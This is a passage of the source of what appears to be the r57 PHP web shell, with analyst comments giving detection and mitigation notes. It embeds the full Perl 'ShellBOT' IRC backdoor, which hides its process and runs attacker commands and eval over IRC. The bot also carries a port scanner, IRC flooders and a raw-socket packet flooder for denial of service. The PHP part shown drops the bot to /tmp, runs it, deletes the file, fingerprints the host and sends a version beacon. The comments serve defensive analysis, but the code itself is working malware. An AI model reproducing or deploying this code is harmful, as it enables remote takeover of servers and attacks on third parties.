  2719. use IO::Socket;
  2720. use Socket;
  2721. use IO::Select;
  2722. chdir(\"/\");
  2723. \$servidor=\"\$ARGV[0]\" if \$ARGV[0];
  2724. $0=\"\$processo\".\"\0\"x16;;
  2725. my \$pid=fork;
  2726. exit if \$pid;
  2727. die \"Problema com o fork: $!\" unless defined(\$pid);
  2728. my \$dcc_sel = new IO::Select->new();
  2729. #############################
  2730. # B0tchZ na veia ehehe :P #
  2731. #############################
  2732.  
  2733. \$sel_cliente = IO::Select->new();
  2734. sub sendraw {
  2735.  if ($#_ == '1') {
  2736.    my \$socket = \$_[0];
  2737.    print \$socket \"\$_[1]\\n\";
  2738.  } else {
  2739.      print \$IRC_cur_socket \"\$_[0]\\n\";
  2740.  }
  2741. }
  2742. #################################
  2743. sub conectar {
  2744.   my \$meunick = \$_[0];
  2745.   my \$servidor_con = \$_[1];
  2746.   my \$porta_con = \$_[2];
  2747.  
  2748.   my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
  2749.   if (defined(\$IRC_socket)) {
  2750.     \$IRC_cur_socket = \$IRC_socket;
  2751.  
  2752.     \$IRC_socket->autoflush(1);
  2753.     \$sel_cliente->add(\$IRC_socket);
  2754.  
  2755.     \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
  2756.     \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
  2757.     \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2758.     \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
  2759.     nick(\"\$meunick\");
  2760.     sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
  2761.     sleep 1;
  2762.   }
  2763. } #####################
  2764.  
  2765. my \$line_temp;
  2766. while( 1 ) {
  2767.   while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
  2768.   delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
  2769.   &DCC::connections;
  2770.   my @ready = \$sel_cliente->can_read(0);
  2771.   next unless(@ready);
  2772.   foreach \$fh (@ready) {
  2773.     \$IRC_cur_socket = \$fh;
  2774.     \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
  2775.     \$nread = sysread(\$fh, \$msg, 4096);
  2776.     if (\$nread == 0) {
  2777.        \$sel_cliente->remove(\$fh);
  2778.        \$fh->close;
  2779.        delete(\$irc_servers{\$fh});
  2780.     }
  2781.     @lines = split (/\\n/, \$msg);
  2782.  
  2783.     for(my \$c=0; \$c<= $#lines; \$c++) {
  2784.       \$line = \$lines[\$c];
  2785.       \$line=\$line_temp.\$line if (\$line_temp);
  2786.       \$line_temp='';
  2787.       \$line =~ s/\\r$//;
  2788.       unless (\$c == $#lines) {
  2789.         parse(\"\$line\");
  2790.       } else {
  2791.           if ($#lines == 0) {
  2792.             parse(\"\$line\");
  2793.           } elsif (\$lines[\$c] =~ /\\r$/) {
  2794.               parse(\"\$line\");
  2795.           } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  2796.               parse(\"\$line\");
  2797.           } else {
  2798.               \$line_temp = \$line;
  2799.           }
  2800.       }
  2801.      }
  2802.   }
  2803. }
  2804.  
  2805. #########################
  2806.  
  2807.  
  2808. sub parse {
  2809.   my \$servarg = shift;
  2810.   if (\$servarg =~ /^PING \:(.*)/) {
  2811.     sendraw(\"PONG :$1\");
  2812.   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  2813.       my \$pn=$1; my \$onde = $4; my \$args = $5;
  2814.       if (\$args =~ /^\\001VERSION\\001$/) {
  2815.         notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
  2816.       }
  2817.       if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
  2818.         if (\$onde eq \"\$meunick\"){
  2819.           shell(\"\$pn\", \"\$args\");
  2820.         }
  2821.         if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
  2822.            my \$natrix = $1;
  2823.            my \$arg = $2;
  2824.            if (\$arg =~ /^\!(.*)/) {
  2825.              ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
  2826.            } elsif (\$arg =~ /^\@(.*)/) {
  2827.                \$ondep = \$onde;
  2828.                \$ondep = \$pn if \$onde eq \$meunick;
  2829.                bfunc(\"\$ondep\",\"$1\");
  2830.            } else {
  2831.                shell(\"\$onde\", \"\$arg\");
  2832.            }
  2833.         }
  2834.       }
  2835.   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  2836.       if (lc($1) eq lc(\$meunick)) {
  2837.         \$meunick=$4;
  2838.         \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2839.       }
  2840.   } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
  2841.       nick(\"\$meunick\".int rand(9999));
  2842.   } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  2843.       \$meunick = $2;
  2844.       \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2845.       \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
  2846.       foreach my \$canal (@canais) {
  2847.         sendraw(\"JOIN \$canal\");
  2848.       }
  2849.   }
  2850. }
  2851. ##########################
  2852.  
  2853. sub bfunc {
  2854.  my \$printl = \$_[0];
  2855.  my \$funcarg = \$_[1];
  2856.  if (my \$pid = fork) {
  2857.     waitpid(\$pid, 0);
  2858.  } else {
  2859.      if (fork) {
  2860.         exit;
  2861.       } else {
  2862.           if (\$funcarg =~ /^portscan (.*)/) {
  2863.             my \$hostip=\"$1\";
  2864.             my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
  2865.             my (@aberta, %porta_banner);
  2866.             foreach my \$porta (@portas) {
  2867.                my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
  2868.                if (\$scansock) {
  2869.                   push (@aberta, \$porta);
  2870.                   \$scansock->close;
  2871.                }
  2872.             }
  2873.  
  2874.             if (@aberta) {
  2875.               sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
  2876.             } else {
  2877.                 sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
  2878.             }
  2879.           }
  2880.           if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
  2881.             my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
  2882.             \$dtime = 1 if \$dtime == 0;
  2883.             my %bytes;
  2884.             \$bytes{igmp} = $2 * \$pacotes{igmp};
  2885.             \$bytes{icmp} = $2 * \$pacotes{icmp};
  2886.             \$bytes{o} = $2 * \$pacotes{o};
  2887.             \$bytes{udp} = $2 * \$pacotes{udp};
  2888.             \$bytes{tcp} = $2 * \$pacotes{tcp};
  2889.  
  2890.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
  2891.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
  2892.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
  2893.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
  2894.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
  2895.  
  2896.           }
  2897.           exit;
  2898.       }
  2899.  }
  2900. }
  2901. ##########################
  2902.  
  2903.  
  2904. sub ircase {
  2905.  my (\$kem, \$printl, \$case) = @_;
  2906.  
  2907.  
  2908.  if (\$case =~ /^join (.*)/) {
  2909.     j(\"$1\");
  2910.   }
  2911.   if (\$case =~ /^part (.*)/) {
  2912.      p(\"$1\");
  2913.   }
  2914.   if (\$case =~ /^rejoin\s+(.*)/) {
  2915.      my \$chan = $1;
  2916.      if (\$chan =~ /^(\d+) (.*)/) {
  2917.        for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
  2918.          p(\"$2\");
  2919.          j(\"$2\");
  2920.        }
  2921.      } else {
  2922.          p(\"\$chan\");
  2923.          j(\"\$chan\");
  2924.      }
  2925.   }
  2926.   if (\$case =~ /^op/) {
  2927.      op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
  2928.      my \$oarg = substr(\$case, 3);
  2929.      op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2930.   }
  2931.   if (\$case =~ /^deop/) {
  2932.      deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
  2933.      my \$oarg = substr(\$case, 5);
  2934.      deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2935.   }
  2936.   if (\$case =~ /^voice/) {
  2937.      voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
  2938.      \$oarg = substr(\$case, 6);
  2939.      voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2940.   }
  2941.   if (\$case =~ /^devoice/) {
  2942.      devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
  2943.      \$oarg = substr(\$case, 8);
  2944.      devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2945.   }
  2946.   if (\$case =~ /^msg\s+(\S+) (.*)/) {
  2947.      msg(\"$1\", \"$2\");
  2948.   }
  2949.   if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  2950.      for (my \$cf = 1; \$cf <= $1; \$cf++) {
  2951.        msg(\"$2\", \"$3\");
  2952.      }
  2953.   }
  2954.   if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
  2955.      ctcp(\"$1\", \"$2\");
  2956.   }
  2957.   if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  2958.      for (my \$cf = 1; \$cf <= $1; \$cf++) {
  2959.        ctcp(\"$2\", \"$3\");
  2960.      }
  2961.   }
  2962.   if (\$case =~ /^invite\s+(\S+) (.*)/) {
  2963.      invite(\"$1\", \"$2\");
  2964.   }
  2965.   if (\$case =~ /^nick (.*)/) {
  2966.      nick(\"$1\");
  2967.   }
  2968.   if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
  2969.       conectar(\"$2\", \"$1\", 6667);
  2970.   }
  2971.   if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
  2972.      DCC::SEND(\"$1\", \"$2\");
  2973.   }
  2974.   if (\$case =~ /^raw (.*)/) {
  2975.      sendraw(\"$1\");
  2976.   }
  2977.   if (\$case =~ /^eval (.*)/) {
  2978.     eval \"$1\";
  2979.   }
  2980. }
  2981. ##########################
  2982.  
  2983. sub shell {
  2984.  return unless \$secv;
  2985.  my \$printl=\$_[0];
  2986.  my \$comando=\$_[1];
  2987.  if (\$comando =~ /cd (.*)/) {
  2988.    chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \");
  2989.    return;
  2990.  }
  2991.  elsif (\$pid = fork) {
  2992.     waitpid(\$pid, 0);
  2993.  } else {
  2994.      if (fork) {
  2995.         exit;
  2996.       } else {
  2997.           my @resp=`\$comando 2>&1 3>&1`;
  2998.           my \$c=0;
  2999.           foreach my \$linha (@resp) {
  3000.             \$c++;
  3001.             chop \$linha;
  3002.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
  3003.             if (\$c == \"\$linas_max\") {
  3004.               \$c=0;
  3005.               sleep \$sleep;
  3006.             }
  3007.           }
  3008.           exit;
  3009.       }
  3010.  }
  3011. }
  3012.  
  3013. #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
  3014. sub attacker {
  3015.  my \$iaddr = inet_aton(\$_[0]);
  3016.  my \$msg = 'B' x \$_[1];
  3017.  my \$ftime = \$_[2];
  3018.  my \$cp = 0;
  3019.  my (%pacotes);
  3020.  \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
  3021.  
  3022.  socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
  3023.  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
  3024.  socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
  3025.  socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
  3026.  return(undef) if \$cp == 4;
  3027.  my \$itime = time;
  3028.  my (\$cur_time);
  3029.  while ( 1 ) {
  3030.     for (my \$porta = 1; \$porta <= 65535; \$porta++) {
  3031.       \$cur_time = time - \$itime;
  3032.       last if \$cur_time >= \$ftime;
  3033.       send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
  3034.       send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
  3035.       send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
  3036.       send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
  3037.  
  3038.       # DoS ?? :P
  3039.       for (my \$pc = 3; \$pc <= 255;\$pc++) {
  3040.         next if \$pc == 6;
  3041.         \$cur_time = time - \$itime;
  3042.         last if \$cur_time >= \$ftime;
  3043.         socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
  3044.         send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
  3045.       }
  3046.     }
  3047.     last if \$cur_time >= \$ftime;
  3048.  }
  3049.  return(\$cur_time, %pacotes);
  3050. }
  3051.  
  3052. #############
  3053. # ALIASES #
  3054. #############
  3055.  
  3056. sub action {
  3057.   return unless $#_ == 1;
  3058.   sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
  3059. }
  3060.  
  3061. sub ctcp {
  3062.   return unless $#_ == 1;
  3063.   sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
  3064. }
  3065. sub msg {
  3066.   return unless $#_ == 1;
  3067.   sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
  3068. }
  3069.  
  3070. sub notice {
  3071.   return unless $#_ == 1;
  3072.   sendraw(\"NOTICE \$_[0] :\$_[1]\");
  3073. }
  3074.  
  3075. sub op {
  3076.   return unless $#_ == 1;
  3077.   sendraw(\"MODE \$_[0] +o \$_[1]\");
  3078. }
  3079. sub deop {
  3080.   return unless $#_ == 1;
  3081.   sendraw(\"MODE \$_[0] -o \$_[1]\");
  3082. }
  3083. sub hop {
  3084.    return unless $#_ == 1;
  3085.   sendraw(\"MODE \$_[0] +h \$_[1]\");
  3086. }
  3087. sub dehop {
  3088.   return unless $#_ == 1;
  3089.   sendraw(\"MODE \$_[0] +h \$_[1]\");
  3090. }
  3091. sub voice {
  3092.   return unless $#_ == 1;
  3093.   sendraw(\"MODE \$_[0] +v \$_[1]\");
  3094. }
  3095. sub devoice {
  3096.   return unless $#_ == 1;
  3097.   sendraw(\"MODE \$_[0] -v \$_[1]\");
  3098. }
  3099. sub ban {
  3100.   return unless $#_ == 1;
  3101.   sendraw(\"MODE \$_[0] +b \$_[1]\");
  3102. }
  3103. sub unban {
  3104.   return unless $#_ == 1;
  3105.   sendraw(\"MODE \$_[0] -b \$_[1]\");
  3106. }
  3107. sub kick {
  3108.   return unless $#_ == 1;
  3109.   sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
  3110. }
  3111.  
  3112. sub modo {
  3113.   return unless $#_ == 0;
  3114.   sendraw(\"MODE \$_[0] \$_[1]\");
  3115. }
  3116. sub mode { modo(@_); }
  3117.  
  3118. sub j { &join(@_); }
  3119. sub join {
  3120.   return unless $#_ == 0;
  3121.   sendraw(\"JOIN \$_[0]\");
  3122. }
  3123. sub p { part(@_); }
  3124. sub part {sendraw(\"PART \$_[0]\");}
  3125.  
  3126. sub nick {
  3127.  return unless $#_ == 0;
  3128.  sendraw(\"NICK \$_[0]\");
  3129. }
  3130.  
  3131. sub invite {
  3132.   return unless $#_ == 1;
  3133.   sendraw(\"INVITE \$_[1] \$_[0]\");
  3134. }
  3135. sub topico {
  3136.   return unless $#_ == 1;
  3137.   sendraw(\"TOPIC \$_[0] \$_[1]\");
  3138. }
  3139. sub topic { topico(@_); }
  3140.  
  3141. sub whois {
  3142.  return unless $#_ == 0;
  3143.  sendraw(\"WHOIS \$_[0]\");
  3144. }
  3145. sub who {
  3146.  return unless $#_ == 0;
  3147.  sendraw(\"WHO \$_[0]\");
  3148. }
  3149. sub names {
  3150.  return unless $#_ == 0;
  3151.  sendraw(\"NAMES \$_[0]\");
  3152. }
  3153. sub away {
  3154.  sendraw(\"AWAY \$_[0]\");
  3155. }
  3156. sub back { away(); }
  3157. sub quit {
  3158.  sendraw(\"QUIT :\$_[0]\");
  3159. }
  3160.  
  3161. # DCC
  3162. #########################
  3163.  
  3164. package DCC;
  3165.  
  3166. sub connections {
  3167.   my @ready = \$dcc_sel->can_read(1);
  3168. # return unless (@ready);
  3169.   foreach my \$fh (@ready) {
  3170.     my \$dcctipo = \$DCC{\$fh}{tipo};
  3171.     my \$arquivo = \$DCC{\$fh}{arquivo};
  3172.     my \$bytes = \$DCC{\$fh}{bytes};
  3173.     my \$cur_byte = \$DCC{\$fh}{curbyte};
  3174.     my \$nick = \$DCC{\$fh}{nick};
  3175.  
  3176.  
  3177.     my \$msg;
  3178.     my \$nread = sysread(\$fh, \$msg, 10240);
  3179.  
  3180.     if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
  3181.        \$DCC{\$fh}{status} = \"Cancelado\";
  3182.        \$DCC{\$fh}{ftime} = time;
  3183.        \$dcc_sel->remove(\$fh);
  3184.        \$fh->close;
  3185.        next;
  3186.     }
  3187.  
  3188.     if (\$dcctipo eq \"get\") {
  3189.        \$DCC{\$fh}{curbyte} += length(\$msg);
  3190.  
  3191.        my \$cur_byte = \$DCC{\$fh}{curbyte};
  3192.  
  3193.        open(FILE, \">> \$arquivo\");
  3194.        print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
  3195.        close(FILE);
  3196.  
  3197.        my \$packbyte = pack(\"N\", \$cur_byte);
  3198.        print \$fh \"\$packbyte\";
  3199.  
  3200.  
  3201.        if (\$bytes == \$cur_byte) {
  3202.           \$dcc_sel->remove(\$fh);
  3203.           \$fh->close;
  3204.           \$DCC{\$fh}{status} = \"Recebido\";
  3205.           \$DCC{\$fh}{ftime} = time;
  3206.           next;
  3207.        }
  3208.     } elsif (\$dcctipo eq \"send\") {
  3209.          my \$send = \$fh->accept;
  3210.          \$send->autoflush(1);
  3211.          \$dcc_sel->add(\$send);
  3212.          \$dcc_sel->remove(\$fh);
  3213.          \$DCC{\$send}{tipo} = 'sendcon';
  3214.          \$DCC{\$send}{itime} = time;
  3215.          \$DCC{\$send}{nick} = \$nick;
  3216.          \$DCC{\$send}{bytes} = \$bytes;
  3217.          \$DCC{\$send}{curbyte} = 0;
  3218.          \$DCC{\$send}{arquivo} = \$arquivo;
  3219.          \$DCC{\$send}{ip} = \$send->peerhost;
  3220.          \$DCC{\$send}{porta} = \$send->peerport;
  3221.          \$DCC{\$send}{status} = \"Enviando\";
  3222.          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
  3223.          open(FILE, \"< \$arquivo\");
  3224.          my \$fbytes;
  3225.          read(FILE, \$fbytes, 1024);
  3226.          print \$send \"\$fbytes\";
  3227.          close FILE;
  3228. # delete(\$DCC{\$fh});
  3229. } elsif (\$dcctipo eq 'sendcon') {
  3230.          my \$bytes_sended = unpack(\"N\", \$msg);
  3231.          \$DCC{\$fh}{curbyte} = \$bytes_sended;
  3232.          if (\$bytes_sended == \$bytes) {
  3233.             \$fh->close;
  3234.             \$dcc_sel->remove(\$fh);
  3235.             \$DCC{\$fh}{status} = \"Enviado\";
  3236.             \$DCC{\$fh}{ftime} = time;
  3237.             next;
  3238.          }
  3239.          open(SENDFILE, \"< \$arquivo\");
  3240.          seek(SENDFILE, \$bytes_sended, 0);
  3241.          my \$send_bytes;
  3242.          read(SENDFILE, \$send_bytes, 1024);
  3243.          print \$fh \"\$send_bytes\";
  3244.          close(SENDFILE);
  3245.     }
  3246.   }
  3247. }
  3248. ##########################
  3249.  
  3250. sub SEND {
  3251.  my (\$nick, \$arquivo) = @_;
  3252.  unless (-r \"\$arquivo\") {
  3253.    return(0);
  3254.  }
  3255.  
  3256.  my \$dccark = \$arquivo;
  3257.  \$dccark =~ s/[.*\/](\S+)/$1/;
  3258.  
  3259.  my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
  3260.  my \$longip = unpack(\"N\",inet_aton(\$meuip));
  3261.  
  3262.  my @filestat = stat(\$arquivo);
  3263.  my \$size_total=\$filestat[7];
  3264.  if (\$size_total == 0) {
  3265.     return(0);
  3266.  }
  3267.  
  3268.  my (\$porta, \$sendsock);
  3269.  do {
  3270.    \$porta = int rand(64511);
  3271.    \$porta += 1024;
  3272.    \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
  3273.  } until \$sendsock;
  3274.  
  3275.  \$DCC{\$sendsock}{tipo} = 'send';
  3276.  \$DCC{\$sendsock}{nick} = \$nick;
  3277.  \$DCC{\$sendsock}{bytes} = \$size_total;
  3278.  \$DCC{\$sendsock}{arquivo} = \$arquivo;
  3279.  
  3280.  &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
  3281.  
  3282. }
  3283.  
  3284. sub GET {
  3285.  my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
  3286.  return(0) if (-e \"\$arquivo\");
  3287.  if (open(FILE, \"> \$arquivo\")) {
  3288.     close FILE;
  3289.  } else {
  3290.    return(0);
  3291.  }
  3292.  
  3293.  my \$dccip=fixaddr(\$dcclongip);
  3294.  return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
  3295.  my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
  3296.  \$dccsock->autoflush(1);
  3297.  \$dcc_sel->add(\$dccsock);
  3298.  \$DCC{\$dccsock}{tipo} = 'get';
  3299.  \$DCC{\$dccsock}{itime} = time;
  3300.  \$DCC{\$dccsock}{nick} = \$nick;
  3301.  \$DCC{\$dccsock}{bytes} = \$bytes;
  3302.  \$DCC{\$dccsock}{curbyte} = 0;
  3303.  \$DCC{\$dccsock}{arquivo} = \$arquivo;
  3304.  \$DCC{\$dccsock}{ip} = \$dccip;
  3305.  \$DCC{\$dccsock}{porta} = \$dccporta;
  3306.  \$DCC{\$dccsock}{status} = \"Recebendo\";
  3307. }
  3308. ############################
  3309. # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
  3310. sub Status {
  3311.  my \$socket = shift;
  3312.  my \$sock_tipo = \$DCC{\$socket}{tipo};
  3313.  unless (lc(\$sock_tipo) eq \"chat\") {
  3314.    my \$nick = \$DCC{\$socket}{nick};
  3315.    my \$arquivo = \$DCC{\$socket}{arquivo};
  3316.    my \$itime = \$DCC{\$socket}{itime};
  3317.    my \$ftime = time;
  3318.    my \$status = \$DCC{\$socket}{status};
  3319.    \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
  3320.  
  3321.    my \$d_time = \$ftime-\$itime;
  3322.  
  3323.    my \$cur_byte = \$DCC{\$socket}{curbyte};
  3324.    my \$bytes_total = \$DCC{\$socket}{bytes};
  3325.  
  3326.    my \$rate = 0;
  3327.    \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
  3328.    my \$porcen = (\$cur_byte*100)/\$bytes_total;
  3329.  
  3330.    my (\$r_duv, \$p_duv);
  3331.    if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
  3332.       \$r_duv = $3; \$r_duv++ if $4 >= 5;
  3333.       \$rate = \"$1\.$2\".\"\$r_duv\";
  3334.    }
  3335.    if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
  3336.       \$p_duv = $3; \$p_duv++ if $4 >= 5;
  3337.       \$porcen = \"$1\.$2\".\"\$p_duv\";
  3338.    }
  3339.    return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
  3340.  }
  3341.  
  3342.  return(0);
  3343. }
  3344.  
  3345. # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
  3346. sub fixaddr {
  3347.    my (\$address) = @_;
  3348.  
  3349.    chomp \$address; # just in case, sigh.
  3350.    if (\$address =~ /^\d+$/) {
  3351.        return inet_ntoa(pack \"N\", \$address);
  3352.    } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
  3353.        return \$address;
  3354.    } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
  3355.        return inet_ntoa(((gethostbyname(\$address))[4])[0]);
  3356.    } else {
  3357.        return;
  3358.    }
  3359. }
  3360. ############################
  3361. ";
  // Analyst note: drop-run-delete. The generated Perl source is written to
  // /tmp/ircs.pl, started with `perl`, and the file is removed as soon as system()
  // returns. The script forks and its parent exits immediately, so the removal happens
  // while the child is still running: a file-system sweep of /tmp will usually find
  // nothing, and process and network telemetry are the dependable evidence.
  // The fopen()/fputs() results are not checked.
  // Mitigation: egress filtering for the web-server account and a restrictive
  // disable_functions list (system and its relatives) both break this path.
  3362. $bot = "/tmp/ircs.pl";
  3363. $open = fopen($bot,"w");
  3364. fputs($open,$file);
  3365. fclose($open);
  3366. $cmd="perl $bot";
  3367. $cmd2="rm $bot";
  3368. system($cmd);
  3369. system($cmd2);
  // Overwrites the request's cmd field with an echo command string; presumably the
  // command handler elsewhere in the file runs it to show a status line (not visible
  // here).
  3370. $_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
  3371.  
  3372. }
  3373.  
  // Analyst note: host fingerprint cache. When $unix is set, the shell runs `uname -a`
  // and `id` through ex() (defined elsewhere in the file) the first time and stores
  // the output in cookies named uname and id; unless safe_mode is on it does the same
  // for two sysctl OS-type/release queries under the cookie name sysctl. On later
  // requests the values are taken from the cookies instead of re-running the commands,
  // so whatever the client sends in those cookies is what the page displays.
  // Detection: Set-Cookie headers named uname, id or sysctl whose values look like
  // command output are a response-side indicator.
  3374. if($unix)
  3375.  {
  3376.  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
  3377.  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
  3378.  if($safe_mode) { $sysctl = '-'; }
  3379.  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
  3380.  else
  3381.   {
  3382.    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
  3383.    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
  3384.    if(empty($sysctl)) { $sysctl = '-'; }
  3385.    setcookie('sysctl',$sysctl);
  3386.   }
  3387.  }
  // Analyst note: version beacon. After emitting $head (defined elsewhere), and only
  // when no cmd was posted, the code looks at the first octet of SERVER_ADDR. If it is
  // not 127, 192, 172 or 10, the page embeds a zero-sized image and calls readfile()
  // on a version.php URL, passing the shell version with the dots removed. The octet
  // test is coarse: it treats all of 172.* and 192.* as internal. In this copy both
  // URLs point at 127.0.0.1. Errors from both calls are suppressed with @.
  // Detection: an outbound HTTP request for version.php?version=... made by the web
  // server itself, or that image tag in a response body.
  3388. echo $head;
  3389. echo '</head>';
  3390. if(empty($_POST['cmd'])) {
  3391. $serv = array(127,192,172,10);
  3392. $addr=@explode('.', $_SERVER['SERVER_ADDR']);
  3393. $current_version = str_replace('.','',$version);
  3394. if (!in_array($addr[0], $serv)) {
  3395. @print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
  3396. @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
  // Analyst note: banner and navigation bar. The banner text is "R57 ver 1.5" while
  // $version earlier in the file is '1.31', so do not rely on one version string when
  // writing signatures. Each menu entry is a link back to PHP_SELF with a bare
  // query-string keyword (sqlman, phpinfo, phpini, tmp, delete, and cpu/mem/users when
  // $unix is set). PHP_SELF is written into the href without escaping. ws(), $lb, $rb
  // and $lang are defined elsewhere in the file.
  // Detection: access-log entries for a single .php file requested with these bare
  // keywords as the whole query string.
  3397. echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Webdings size=10><b>@</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
